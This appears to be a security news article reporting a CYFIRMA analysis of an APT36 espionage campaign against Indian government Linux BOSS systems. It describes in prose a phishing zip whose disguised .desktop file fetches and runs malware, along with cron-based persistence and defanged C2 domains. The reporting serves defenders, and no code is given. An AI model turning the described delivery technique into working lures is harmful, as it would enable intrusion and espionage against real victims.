Linux Under Attack: APT36 Launches New Cyber-Espionage Campaign on Indian Govt

The threat landscape in South Asia has taken a new turn with the resurgence of APT36 (Transparent Tribe)—a Pakistan-based, state-sponsored threat group known for long-term espionage operations. According to a new CYFIRMA report, the group has launched an advanced cyber-espionage campaign targeting Indian government entities, with a particular focus on the Linux BOSS operating system.

As CYFIRMA notes, “APT36’s capability to customize its delivery mechanisms according to the victim’s operating environment thereby increases its chances of success while maintaining persistent access to critical government infrastructure and evading traditional security controls.”

The campaign begins with highly tailored spear phishing emails. Victims receive a weaponized archive file (Meeting_Notice_Ltr_ID1543ops.pdf_.zip) that contains a disguised .desktop shortcut. While masquerading as a simple PDF file, this shortcut executes a chain of commands when opened.

The report explains: “The ‘.desktop’ file is crafted to masquerade as an ordinary PDF shortcut but contains a chain of commands embedded in its Exec= line that are executed automatically and sequentially as soon as the file is launched.”

These commands download a malicious payload from attacker-controlled infrastructure, convert it into binary form, and execute it—while simultaneously opening a decoy PDF in Firefox to trick the victim into believing nothing unusual occurred.

Unlike traditional Transparent Tribe campaigns that often target Windows environments, this campaign represents a tactical shift. The focus on Linux BOSS, an indigenous Indian government operating system, demonstrates the adversary’s intent to bypass hardened defenses.

CYFIRMA emphasizes: “The adoption of .desktop payloads targeting Linux BOSS reflects a tactical shift toward exploiting indigenous technologies. Combined with traditional Windows-based malware and mobile implants, this shows the group’s intent to diversify access vectors and ensure persistence even in hardened environments.”

The malware communicates with newly registered malicious domains, including securestore[.]cv and modgovindia[.]space, both flagged as suspicious infrastructure linked to APT36.

Static and dynamic analysis revealed that the ELF malware establishes persistence by creating cron jobs and enabling disguised system services. CYFIRMA observed that “the malware established command-and-control (C2) communication with the domain modgovindia[.]space, which resolves to the IP address 45[.]141[.]58[.]199, over port 4000.”

This infrastructure enables exfiltration of sensitive data while maintaining covert access for long-term espionage.

APT36, also known as Transparent Tribe or Mythic Leopard, has been active for more than a decade. Their campaigns typically align with Pakistan’s strategic objectives, particularly targeting Indian government, military, diplomatic, and critical infrastructure sectors.

The report highlights that “APT36’s persistent targeting reflects its strategic objective of collecting sensitive information to support Pakistan’s military and diplomatic priorities.”

Notably, the group has expanded its reach to include education, research, and civil society organizations, increasing the risk to diplomatic partners and supply chains.

The CYFIRMA analysis underscores how APT36 continues to evolve. By adopting multi-platform delivery strategies, leveraging .desktop files for Linux environments, and embedding persistence in system-level processes, the group demonstrates its growing sophistication and adaptability.

As the report concludes: “The group’s ability to rapidly deploy tailored payloads and infrastructure demonstrates increasing sophistication and underscores the need for heightened vigilance, particularly around spear-phishing vectors and Linux-based attack surfaces.”

Related Posts:

• APT36 Suspected in India Gov Spoofing Phishing with ClickFix Tactics
• APT36 Unleashes Linux Malware: Transparent Tribe Targets Indian Government with Go-Based Espionage Tools
• APT36 Escalates Cyber-Espionage on India: Poseidon Backdoor Targets Railways, Oil & Government
• APT36 Targets Indian Government with Sophisticated Phishing, Bypassing MFA with Real-Time OTP Harvest
• Researchers found that backdoors hijacks desktop shortcuts to infect user devices